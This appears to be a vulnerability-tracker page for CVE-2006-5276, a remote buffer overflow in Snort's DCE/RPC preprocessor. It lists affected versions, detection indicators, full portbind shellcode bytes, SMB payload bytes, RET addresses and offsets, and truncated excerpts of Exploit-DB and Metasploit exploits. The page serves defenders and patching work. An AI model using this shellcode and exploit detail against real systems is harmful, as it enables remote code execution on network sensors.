CVE-2006-5276
published 2007-02-20CVE-2006-5276: Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote…
PriorityP268critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
79.32%
99.6th percentile
Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| snort | snort | <= 2.6.1.2 | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| sourcefire | intrusion_sensor | — | — |
| sourcefire | intrusion_sensor | — | — |
| sourcefire | intrusion_sensor | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
bytes↗
\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8
bytes↗
\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10
bytes↗
\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44
bytes↗
\x00\x00\xde\xad
bytes↗
\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80\x00\x48\x00\x00\x00\xff\x01
- →Exploit traffic targets TCP port 139 (NetBIOS/SMB) with crafted SMB Write AndX requests containing oversized DCE/RPC fragments; the Snort sensor itself is the victim, not the destination host. ↗
- →Look for SMB traffic with a NetBIOS Session Service length field set to 0xDEAD (\x00\x00\xde\xad), which is the Metasploit module's static oversized length marker. ↗
- →Detect two consecutive SMB Write AndX requests in a single TCP segment where the second Write AndX (\x0e\xff) carries an anomalously large DCE/RPC bind fragment — this is the overflow trigger pattern. ↗
- →On Linux targets, watch for a new listener on TCP port 4444 spawned by the snort process after exploitation (portbind shellcode). ↗
- →The Windows exploit uses a JMP ESP gadget at 0x7c941eed inside a standard Windows DLL; look for EIP/RET control redirected to that address in crash dumps or memory forensics. ↗
- →The Metasploit module uses a Windows Universal RET of 0x00407c01 (JMP ESP in snort.exe) with a payload offset of 289 bytes, and a Redhat 8 RET of 0xbffff110 with offset 317 bytes — useful for stack-frame analysis. ↗
- →SMB Tree Connect AndX targeting the IPC$ share path (\\<host>\IPC$) encoded in Unicode is present in all exploit variants as a precursor to the Write AndX overflow. ↗
- ·Affected Snort versions are 2.6.1, 2.6.1.1, 2.6.1.2, and 2.7.0 beta 1; the fix is Snort 2.6.1.3+ or 2.7 beta 2+. The DCE/RPC preprocessor must be enabled in snort.conf for the vulnerability to be exploitable. ↗
- ·SourceFire Intrusion Sensor versions 4.1, 4.5, and 4.6 are also vulnerable; patching scope extends beyond open-source Snort. ↗
- ·The exploit is effective against any host on the Snort-monitored network segment; the destination host does not need to be running SMB — Snort inspects the traffic passively and is itself the target. ↗
- ·The Metasploit module deregisters FILTER, PCAPFILE, SNAPLEN, and TIMEOUT options and uses raw packet injection (PacketFu/pcap), requiring the attacker to have raw socket / packet-injection capability on the monitored network. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Snort 2 - DCE/RPC Preprocessor Buffer Overflow (Metasploit)
exploitdb·2012-04-09
CVE-2006-5276 Snort 2 - DCE/RPC Preprocessor Buffer Overflow (Metasploit)
Snort 2 - DCE/RPC Preprocessor Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'Snort 2 DCE/RPC preprocessor Buffer Overflow',
'Description' => %q{
This module allows remote attackers to execute arbitrary code by exploiting the
Snort service via crafted SMB traffic. The vulnerability is due to a boundary
error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,
which may result a stack-based buffer overflow with a specially crafted packet
sent on a network that is monitored by Snort.
Vulnerable versions inclu
Exploit-DB
Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow
exploitdb·2007-03-30·CVSS 10.0
CVE-2006-5276 [CRITICAL] Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow
Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow
---
#!/usr/bin/python
#
# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in
# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.
# This code was tested against snort-2.6.1 running on Red Hat Linux 8
#
# Author shall bear no responsibility for any screw ups caused by using this code
# Winny Thomas :-)
import os
import sys
import time
from scapy import *
# Linux portbind shellcode; Binds shell on TCP port 4444
shellcode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
shellcode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
shellcode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
shellcode += "\xb0\x66\xcd
Exploit-DB
Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow
exploitdb·2007-03-01
CVE-2006-5276 Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow
Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow
---
#!/usr/bin/python
#
# Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version)
#
# Author: Trirat Puttaraksa
#
# http://sf-freedom.blogspot.com
#
######################################################
# For educational purpose only
#
# This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1
#
# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/)
# to inject the packet, so you have to install Scapy before use it.
#
#######################################################
import sys
from scapy import *
from struct import pack
conf.verb = 0
# NetBIOS Session Service
payload = "\x00\x00\x02\xab"
# SMB Header
payload += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
payload += "\x00\x
Exploit-DB
Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow (Denial of Service) (PoC)
exploitdb·2007-02-23
CVE-2006-5276 Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow (Denial of Service) (PoC)
Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow (Denial of Service) (PoC)
---
#!/usr/bin/python
#
# Snort DCE/RPC Preprocessor Buffer Overflow (DoS)
#
# Author: Trirat Puttaraksa
#
# http://sf-freedom.blogspot.com
#
######################################################
# For educational purpose only
#
# This exploit just crash Snort 2.6.1 on Fedora Core 4. However, Code Execution
# may be possible, but I have no time to make it :(
# I will post the information about this vulnerability in my blog soon
#
# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/)
# to inject the packet, so you have to install Scapy before use it.
#
#######################################################
import sys
from scapy import *
from struct import pack
conf.verb = 0
# NetBIOS S
Metasploit
Snort 2 DCE/RPC Preprocessor Buffer Overflow
metasploit
Snort 2 DCE/RPC Preprocessor Buffer Overflow
Snort 2 DCE/RPC Preprocessor Buffer Overflow
This module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result a stack-based buffer overflow with a specially crafted packet sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort network may be used as the remote host. The remote host does not need to be running the SMB service for the exploit to be successful.
http://fedoranews.org/updates/FEDORA-2007-206.shtmlhttp://iss.net/threats/257.htmlhttp://secunia.com/advisories/24190http://secunia.com/advisories/24235http://secunia.com/advisories/24239http://secunia.com/advisories/24240http://secunia.com/advisories/24272http://secunia.com/advisories/26746http://security.gentoo.org/glsa/glsa-200703-01.xmlhttp://www.kb.cert.org/vuls/id/196240http://www.osvdb.org/32094http://www.securityfocus.com/archive/1/461810/100/0/threadedhttp://www.securityfocus.com/bid/22616http://www.securitytracker.com/id?1017669http://www.securitytracker.com/id?1017670http://www.snort.org/docs/advisory-2007-02-19.htmlhttp://www.us-cert.gov/cas/techalerts/TA07-050A.htmlhttp://www.vupen.com/english/advisories/2007/0656http://www.vupen.com/english/advisories/2007/0668http://www116.nortelnetworks.com/pub/repository/CLARIFY/DOCUMENT/2007/08/021923-01.pdfhttp://www130.nortelnetworks.com/go/main.jsp?cscat=BLTNDETAIL&DocumentOID=540173https://bugzilla.redhat.com/show_bug.cgi?id=229265https://exchange.xforce.ibmcloud.com/vulnerabilities/31275https://www.exploit-db.com/exploits/3362http://fedoranews.org/updates/FEDORA-2007-206.shtmlhttp://iss.net/threats/257.htmlhttp://secunia.com/advisories/24190http://secunia.com/advisories/24235http://secunia.com/advisories/24239http://secunia.com/advisories/24240http://secunia.com/advisories/24272http://secunia.com/advisories/26746http://security.gentoo.org/glsa/glsa-200703-01.xmlhttp://www.kb.cert.org/vuls/id/196240http://www.osvdb.org/32094http://www.securityfocus.com/archive/1/461810/100/0/threadedhttp://www.securityfocus.com/bid/22616http://www.securitytracker.com/id?1017669http://www.securitytracker.com/id?1017670http://www.snort.org/docs/advisory-2007-02-19.htmlhttp://www.us-cert.gov/cas/techalerts/TA07-050A.htmlhttp://www.vupen.com/english/advisories/2007/0656http://www.vupen.com/english/advisories/2007/0668http://www116.nortelnetworks.com/pub/repository/CLARIFY/DOCUMENT/2007/08/021923-01.pdfhttp://www130.nortelnetworks.com/go/main.jsp?cscat=BLTNDETAIL&DocumentOID=540173https://bugzilla.redhat.com/show_bug.cgi?id=229265https://exchange.xforce.ibmcloud.com/vulnerabilities/31275https://www.exploit-db.com/exploits/3362
2007-02-20
Published